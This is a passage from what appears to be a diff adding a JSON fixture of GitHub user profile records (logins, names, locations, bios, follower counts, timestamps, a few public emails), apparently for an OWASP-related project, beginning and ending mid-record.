"company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2022-12-02T12:24:02Z", + "updated_at": "2024-08-28T08:08:10Z", + "node_id": "U_kgDOByIUZg", + "bio": "", + "is_hireable": false, + "twitter_username": "Santhoshmani_p" + } +}, +{ + "model": "github.user", + "pk": 2767, + "fields": { + "nest_created_at": "2024-09-12T02:20:34.415Z", + "nest_updated_at": "2024-09-22T19:44:55.293Z", + "name": "", + "login": "letsintegreat", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37345795?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 53, + "public_gists_count": 2, + "public_repositories_count": 47, + "created_at": "2018-03-13T17:57:28Z", + "updated_at": "2024-09-15T10:31:03Z", + "node_id": "MDQ6VXNlcjM3MzQ1Nzk1", + "bio": "More or less an Android Dev.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2768, + "fields": { + "nest_created_at": "2024-09-12T02:20:35.245Z", + "nest_updated_at": "2024-09-22T19:44:56.577Z", + "name": "Amrit Prakash", + "login": "solo-daemon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65587505?v=4", + "company": "", + "location": "IITR India", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 61, + "created_at": "2020-05-19T06:07:43Z", + "updated_at": "2024-09-16T12:12:20Z", + "node_id": "MDQ6VXNlcjY1NTg3NTA1", + "bio": "Yo! this is amrit and I like to try out new technologies", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2769, + "fields": { + "nest_created_at": "2024-09-12T02:20:42.738Z", + "nest_updated_at": "2024-09-22T19:44:57.515Z", + "name": "Parag Gupta", + "login": "Dante291", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103507835?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2022-04-12T12:11:33Z", + "updated_at": "2024-09-18T12:41:15Z", + "node_id": "U_kgDOBitnew", + "bio": "Google Summer of Code @PalisadoesFoundation | XR and Flutter Developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2770, + "fields": { + "nest_created_at": "2024-09-12T02:21:05.531Z", + "nest_updated_at": "2024-09-22T19:45:16.884Z", + "name": "David Scrobonia", + "login": "dscrobonia", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5150944?v=4", + "company": "", + "location": "United States", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 25, + "public_gists_count": 3, + "public_repositories_count": 27, + "created_at": "2013-08-02T22:10:43Z", + "updated_at": "2024-09-18T00:50:17Z", + "node_id": "MDQ6VXNlcjUxNTA5NDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "david_scrobonia" + } +}, +{ + "model": "github.user", + "pk": 2771, + "fields": { + "nest_created_at": "2024-09-12T02:21:06.325Z", + "nest_updated_at": "2024-09-12T02:21:06.325Z", + "name": "Ubaid Shamsi", + "login": "Shamsi12", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57343383?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2019-11-04T07:04:10Z", + "updated_at": "2024-09-01T20:08:22Z", + "node_id": "MDQ6VXNlcjU3MzQzMzgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2772, + "fields": { + "nest_created_at": "2024-09-12T02:21:07.897Z", + "nest_updated_at": "2024-09-12T02:21:07.897Z", + "name": "", + "login": "youngklee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1425072?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 4, + "public_repositories_count": 37, + "created_at": "2012-02-10T02:25:34Z", + "updated_at": "2024-04-24T19:08:23Z", + "node_id": "MDQ6VXNlcjE0MjUwNzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2773, + "fields": { + "nest_created_at": "2024-09-12T02:21:09.559Z", + "nest_updated_at": "2024-09-12T02:21:10.396Z", + "name": "", + "login": "DeDarko", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45122738?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-11-17T12:43:27Z", + "updated_at": "2023-01-13T08:14:02Z", + "node_id": "MDQ6VXNlcjQ1MTIyNzM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2774, + "fields": { + "nest_created_at": "2024-09-12T02:21:11.211Z", + "nest_updated_at": "2024-09-12T02:21:11.211Z", + "name": "Eric Jiang", + "login": "eric-jiang", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7027407?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-03-21T23:46:14Z", + "updated_at": "2024-07-25T23:29:33Z", + "node_id": "MDQ6VXNlcjcwMjc0MDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2775, + "fields": { + "nest_created_at": "2024-09-12T02:21:12.074Z", + "nest_updated_at": "2024-09-22T19:45:15.177Z", + "name": "", + "login": "si076", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107757981?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-06-18T13:06:41Z", + "updated_at": "2024-02-03T09:13:46Z", + "node_id": "U_kgDOBmxBnQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2776, + "fields": { + "nest_created_at": "2024-09-12T02:21:30.398Z", + "nest_updated_at": "2024-09-12T02:21:30.398Z", + "name": "", + "login": "marjanovicstefan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73475725?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2020-10-26T12:08:12Z", + "updated_at": "2023-06-02T11:57:08Z", + "node_id": "MDQ6VXNlcjczNDc1NzI1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2777, + "fields": { + "nest_created_at": "2024-09-12T02:21:31.200Z", + "nest_updated_at": "2024-09-12T02:21:31.200Z", + "name": "", + "login": "naftolib", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17856481?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-03-15T16:53:00Z", + "updated_at": "2023-05-11T13:13:56Z", + "node_id": "MDQ6VXNlcjE3ODU2NDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2778, + "fields": { + "nest_created_at": "2024-09-12T02:21:32.844Z", + "nest_updated_at": "2024-09-12T02:21:32.844Z", + "name": "Maarten Lemmens", + "login": "mlemmens", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15130187?v=4", + "company": "@elevennl", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-10-14T18:58:17Z", + "updated_at": "2024-07-25T09:33:50Z", + "node_id": "MDQ6VXNlcjE1MTMwMTg3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2779, + "fields": { + "nest_created_at": "2024-09-12T02:21:33.691Z", + "nest_updated_at": "2024-09-12T02:21:33.691Z", + "name": "Adrian Floarea", + "login": "afloarea", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20104805?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2016-06-23T06:56:58Z", + "updated_at": "2024-09-04T11:45:16Z", + "node_id": "MDQ6VXNlcjIwMTA0ODA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2780, + "fields": { + "nest_created_at": "2024-09-12T02:21:34.577Z", + "nest_updated_at": "2024-09-12T02:21:34.577Z", + "name": "", + "login": "janikgithub", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11970648?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-04-16T01:43:46Z", + "updated_at": "2024-07-26T00:15:28Z", + "node_id": "MDQ6VXNlcjExOTcwNjQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2781, + "fields": { + "nest_created_at": "2024-09-12T02:21:35.845Z", + "nest_updated_at": "2024-09-12T02:21:35.845Z", + "name": "", + "login": "osobolev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6529210?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 27, + "public_gists_count": 6, + "public_repositories_count": 28, + "created_at": "2014-01-28T21:44:09Z", + "updated_at": "2024-04-29T12:13:34Z", + "node_id": "MDQ6VXNlcjY1MjkyMTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2782, + "fields": { + "nest_created_at": "2024-09-12T02:21:36.657Z", + "nest_updated_at": "2024-09-22T19:45:29.187Z", + "name": "Eric Norman", + "login": "enapps-enorman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13108369?v=4", + "company": "", + "location": "Kent, WA USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 46, + "created_at": "2015-06-29T20:29:47Z", + "updated_at": "2023-12-26T23:21:16Z", + "node_id": "MDQ6VXNlcjEzMTA4MzY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2783, + "fields": { + "nest_created_at": "2024-09-12T02:21:46.103Z", + "nest_updated_at": "2024-09-22T19:45:34.018Z", + "name": "Uku Sõrmus", + "login": "ukusormus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26545016?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2017-03-20T13:08:54Z", + "updated_at": "2024-09-13T13:36:48Z", + "node_id": "MDQ6VXNlcjI2NTQ1MDE2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2784, + "fields": { + "nest_created_at": "2024-09-12T02:21:49.077Z", + "nest_updated_at": "2024-09-12T02:21:49.077Z", + "name": "Hu shan", + "login": "kmoonn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103509070?v=4", + "company": "Wuhan University of Technology.", + "location": "Wuhan,Hubei,China.", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2022-04-12T12:31:46Z", + "updated_at": "2024-08-18T14:22:42Z", + "node_id": "U_kgDOBitsTg", + "bio": "A 22 years old Aries boy, From Mountain City Chongqing, who is interested in literature, programming, network security, etc.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2785, + "fields": { + "nest_created_at": "2024-09-12T02:21:50.754Z", + "nest_updated_at": "2024-09-12T02:21:50.754Z", + "name": "Siôn le Roux", + "login": "sionleroux", + "email": "sion@sionleroux.com", + "avatar_url": "https://avatars.githubusercontent.com/u/840466?v=4", + "company": "Adevinta Hungary", + "location": "Dunaharaszti, Hungary", + "collaborators_count": 0, + "following_count": 81, + "followers_count": 51, + "public_gists_count": 19, + "public_repositories_count": 58, + "created_at": "2011-06-09T17:18:49Z", + "updated_at": "2024-09-02T09:18:36Z", + "node_id": "MDQ6VXNlcjg0MDQ2Ng==", + "bio": "Born in Namibia 🇳🇦 Living in Hungary 🇭🇺 proud father 👨‍👧‍👦👩‍👧 I work as a software engineer 👨🏼‍💻 and I like 🍺 🎸 🧗🏼‍♂️ 🚵🏼‍♂️ ✝️!", + "is_hireable": false, + "twitter_username": "sinisterstuf" + } +}, +{ + "model": "github.user", + "pk": 2786, + "fields": { + "nest_created_at": "2024-09-12T02:21:57.697Z", + "nest_updated_at": "2024-09-22T19:48:04.539Z", + "name": "OWASP SAMM", + "login": "owaspsamm", + "email": "info@owaspsamm.org", + "avatar_url": "https://avatars.githubusercontent.com/u/74980410?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 149, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2020-11-24T16:43:39Z", + "updated_at": "2024-03-24T15:20:55Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjc0OTgwNDEw", + "bio": "The OWASP SAMM project", + "is_hireable": false, + "twitter_username": "owaspsamm" + } +}, +{ + "model": "github.user", + "pk": 2787, + "fields": { + "nest_created_at": "2024-09-12T02:22:00.906Z", + "nest_updated_at": "2024-09-22T19:48:01.903Z", + "name": "", + "login": "maximbaele", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8909779?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2014-09-25T05:41:35Z", + "updated_at": "2024-06-24T20:42:59Z", + "node_id": "MDQ6VXNlcjg5MDk3Nzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2788, + "fields": { + "nest_created_at": "2024-09-12T02:22:10.600Z", + "nest_updated_at": "2024-09-22T20:22:18.133Z", + "name": "Munyaradzi Mufambisi", + "login": "mufambisi", + "email": "mufambisi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29654800?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2017-06-23T09:45:38Z", + "updated_at": "2024-08-26T02:53:55Z", + "node_id": "MDQ6VXNlcjI5NjU0ODAw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2789, + "fields": { + "nest_created_at": "2024-09-12T02:22:10.974Z", + "nest_updated_at": "2024-09-22T19:48:01.270Z", + "name": "Bart De Win", + "login": "23bartman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5327361?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2013-08-28T05:53:21Z", + "updated_at": "2024-08-25T14:21:20Z", + "node_id": "MDQ6VXNlcjUzMjczNjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2790, + "fields": { + "nest_created_at": "2024-09-12T02:22:13.607Z", + "nest_updated_at": "2024-09-22T20:30:55.265Z", + "name": "", + "login": "derweiser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36988247?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2018-03-02T10:46:53Z", + "updated_at": "2023-02-08T15:47:02Z", + "node_id": "MDQ6VXNlcjM2OTg4MjQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2791, + "fields": { + "nest_created_at": "2024-09-12T02:22:15.297Z", + "nest_updated_at": "2024-09-22T19:47:59.305Z", + "name": "", + "login": "Pat-Duarte", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41348252?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-07-17T22:37:11Z", + "updated_at": "2024-09-03T18:57:18Z", + "node_id": "MDQ6VXNlcjQxMzQ4MjUy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2792, + "fields": { + "nest_created_at": "2024-09-12T02:22:32.069Z", + "nest_updated_at": "2024-09-22T19:48:07.114Z", + "name": "John DiLeo", + "login": "johndileo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6581263?v=4", + "company": "OWASP", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2014-02-04T04:17:19Z", + "updated_at": "2024-08-14T15:24:26Z", + "node_id": "MDQ6VXNlcjY1ODEyNjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2793, + "fields": { + "nest_created_at": "2024-09-12T02:22:40.277Z", + "nest_updated_at": "2024-09-12T02:25:01.121Z", + "name": "John K", + "login": "KGABSWEDEN", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50436829?v=4", + "company": "", + "location": "Sweden", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-05-09T05:26:36Z", + "updated_at": "2022-10-11T15:20:27Z", + "node_id": "MDQ6VXNlcjUwNDM2ODI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2794, + "fields": { + "nest_created_at": "2024-09-12T02:22:42.718Z", + "nest_updated_at": "2024-09-22T19:48:02.529Z", + "name": "Daniel Kefer", + "login": "dkefer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13050398?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 19, + "created_at": "2015-06-25T13:55:55Z", + "updated_at": "2024-09-18T18:53:52Z", + "node_id": "MDQ6VXNlcjEzMDUwMzk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2795, + "fields": { + "nest_created_at": "2024-09-12T02:22:59.181Z", + "nest_updated_at": "2024-09-22T19:48:03.465Z", + "name": "", + "login": "nessimk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29360986?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2017-06-11T22:51:07Z", + "updated_at": "2022-11-05T14:36:41Z", + "node_id": "MDQ6VXNlcjI5MzYwOTg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2796, + "fields": { + "nest_created_at": "2024-09-12T02:23:29.177Z", + "nest_updated_at": "2024-09-12T02:23:29.177Z", + "name": "", + "login": "amedvedchuk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10553379?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2015-01-15T21:52:16Z", + "updated_at": "2024-05-23T16:06:51Z", + "node_id": "MDQ6VXNlcjEwNTUzMzc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2797, + "fields": { + "nest_created_at": "2024-09-12T02:23:29.989Z", + "nest_updated_at": "2024-09-22T19:46:37.692Z", + "name": "Marc", + "login": "marc-on-github", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7252726?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-04-10T15:27:25Z", + "updated_at": "2024-09-17T18:25:22Z", + "node_id": "MDQ6VXNlcjcyNTI3MjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2798, + "fields": { + "nest_created_at": "2024-09-12T02:23:30.366Z", + "nest_updated_at": "2024-09-22T19:48:00.950Z", + "name": "John Ellingsworth", + "login": "johnellingsworth", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4731674?v=4", + "company": "Ellingsworth", + "location": "United States of America", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-06-18T19:33:21Z", + "updated_at": "2024-09-18T11:25:13Z", + "node_id": "MDQ6VXNlcjQ3MzE2NzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2799, + "fields": { + "nest_created_at": "2024-09-12T02:24:01.157Z", + "nest_updated_at": "2024-09-22T20:24:38.899Z", + "name": "romualds", + "login": "romualdszkudlarek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25180888?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-01-17T17:05:27Z", + "updated_at": "2023-09-29T07:52:50Z", + "node_id": "MDQ6VXNlcjI1MTgwODg4", + "bio": "Cybersecurity professional", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2800, + "fields": { + "nest_created_at": "2024-09-12T02:24:35.972Z", + "nest_updated_at": "2024-09-22T19:48:00.285Z", + "name": "", + "login": "BackNot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37146282?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2018-03-07T13:02:15Z", + "updated_at": "2024-08-13T11:59:02Z", + "node_id": "MDQ6VXNlcjM3MTQ2Mjgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2801, + "fields": { + "nest_created_at": "2024-09-12T02:25:08.590Z", + "nest_updated_at": "2024-09-12T02:25:08.590Z", + "name": "Sih Sîng-hông薛丞宏", + "login": "sih4sing5hong5", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5996555?v=4", + "company": "@i3thuan5 ", + "location": "Taiwan", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 131, + "public_gists_count": 11, + "public_repositories_count": 91, + "created_at": "2013-11-21T01:32:24Z", + "updated_at": "2024-09-04T01:51:34Z", + "node_id": "MDQ6VXNlcjU5OTY1NTU=", + "bio": "台語程式開發", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2802, + "fields": { + "nest_created_at": "2024-09-12T02:25:28.267Z", + "nest_updated_at": "2024-09-12T02:25:28.267Z", + "name": "Fran Navarro Alcaraz", + "login": "fnavalca", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13545531?v=4", + "company": "Wallapop", + "location": "Barcelona", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 15, + "public_gists_count": 5, + "public_repositories_count": 8, + "created_at": "2015-07-28T21:21:14Z", + "updated_at": "2024-09-09T10:27:35Z", + "node_id": "MDQ6VXNlcjEzNTQ1NTMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2803, + "fields": { + "nest_created_at": "2024-09-12T02:25:29.457Z", + "nest_updated_at": "2024-09-12T02:25:29.457Z", + "name": "Shraddha G", + "login": "shraddhag", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8229007?v=4", + "company": "", + "location": "London, UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-07-21T22:06:19Z", + "updated_at": "2024-06-28T17:56:58Z", + "node_id": "MDQ6VXNlcjgyMjkwMDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2804, + "fields": { + "nest_created_at": "2024-09-12T02:25:32.296Z", + "nest_updated_at": "2024-09-22T19:47:52.782Z", + "name": "Anthony Mastrean", + "login": "AnthonyMastrean", + "email": "anthony.mastrean@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/217842?v=4", + "company": "", + "location": "Pittsburgh, PA USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 71, + "public_gists_count": 37, + "public_repositories_count": 19, + "created_at": "2010-03-07T16:50:44Z", + "updated_at": "2023-11-01T15:22:36Z", + "node_id": "MDQ6VXNlcjIxNzg0Mg==", + "bio": "", + "is_hireable": true, + "twitter_username": "AnthonyMastrean" + } +}, +{ + "model": "github.user", + "pk": 2805, + "fields": { + "nest_created_at": "2024-09-12T02:25:41.701Z", + "nest_updated_at": "2024-09-12T02:25:41.701Z", + "name": "", + "login": "hward6", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/119614910?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-12-01T16:19:24Z", + "updated_at": "2022-12-01T17:44:20Z", + "node_id": "U_kgDOByEtvg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2806, + "fields": { + "nest_created_at": "2024-09-12T02:25:54.872Z", + "nest_updated_at": "2024-09-22T19:48:53.664Z", + "name": "CRS Project", + "login": "coreruleset", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60900565?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 134, + "public_gists_count": 0, + "public_repositories_count": 41, + "created_at": "2020-02-10T21:05:36Z", + "updated_at": "2024-09-01T11:32:48Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjYwOTAwNTY1", + "bio": "The first line of defense", + "is_hireable": false, + "twitter_username": "CoreRuleSet" + } +}, +{ + "model": "github.user", + "pk": 2807, + "fields": { + "nest_created_at": "2024-09-12T02:26:19.877Z", + "nest_updated_at": "2024-09-12T02:26:19.877Z", + "name": "", + "login": "jhimansh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104558751?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2022-04-28T08:31:16Z", + "updated_at": "2023-04-20T09:36:40Z", + "node_id": "U_kgDOBjtwnw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2808, + "fields": { + "nest_created_at": "2024-09-12T02:26:23.147Z", + "nest_updated_at": "2024-09-12T02:26:23.147Z", + "name": "Override99", + "login": "afekson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101624986?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-03-15T07:13:40Z", + "updated_at": "2024-04-14T10:12:00Z", + "node_id": "U_kgDOBg6smg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2809, + "fields": { + "nest_created_at": "2024-09-12T02:26:28.144Z", + "nest_updated_at": "2024-09-12T02:26:28.144Z", + "name": "", + "login": "jarofi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/113435794?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-09-13T11:00:35Z", + "updated_at": "2023-12-20T13:43:40Z", + "node_id": "U_kgDOBsLkkg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2810, + "fields": { + "nest_created_at": "2024-09-12T02:26:42.521Z", + "nest_updated_at": "2024-09-22T19:48:17.242Z", + "name": "Andrew Howe", + "login": "RedXanadu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6837454?v=4", + "company": "Loadbalancer.org", + "location": "UK, South Coast", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2014-03-03T08:27:15Z", + "updated_at": "2024-07-17T14:59:59Z", + "node_id": "MDQ6VXNlcjY4Mzc0NTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2811, + "fields": { + "nest_created_at": "2024-09-12T02:26:46.274Z", + "nest_updated_at": "2024-09-12T02:26:46.274Z", + "name": "", + "login": "foliv57", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59969260?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-01-16T15:39:43Z", + "updated_at": "2024-03-13T11:57:39Z", + "node_id": "MDQ6VXNlcjU5OTY5MjYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2812, + "fields": { + "nest_created_at": "2024-09-12T02:26:47.546Z", + "nest_updated_at": "2024-09-22T19:48:47.321Z", + "name": 